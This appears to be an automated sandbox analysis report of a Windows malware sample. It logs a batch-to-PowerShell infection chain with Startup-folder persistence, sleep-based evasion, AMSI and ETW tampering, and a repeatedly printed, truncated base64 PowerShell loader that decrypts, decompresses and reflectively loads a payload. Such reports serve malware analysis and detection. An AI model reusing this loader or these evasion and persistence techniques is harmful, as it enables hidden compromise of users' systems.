Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4084	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2712	Thread sleep count: 1145 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2712	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8740	Thread sleep count: 2058 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8764	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736	Thread sleep count: 2562 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8884	Thread sleep count: 1139 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8872	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1104	Thread sleep count: 1502 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\			Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match	File source: amsi32_8344.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_8840.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2184.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5520.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_2484.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_4756.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_9020.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7908.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_5436.amsi.csv, type: OTHER

Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
Source: 15.2.powershell.exe.6fdd700.3.raw.unpack, mdzzx.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\WordDoc.bat"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f830a6f2.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cb5dd181.cmd"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_91fb5707.cmd"			Jump to behavior
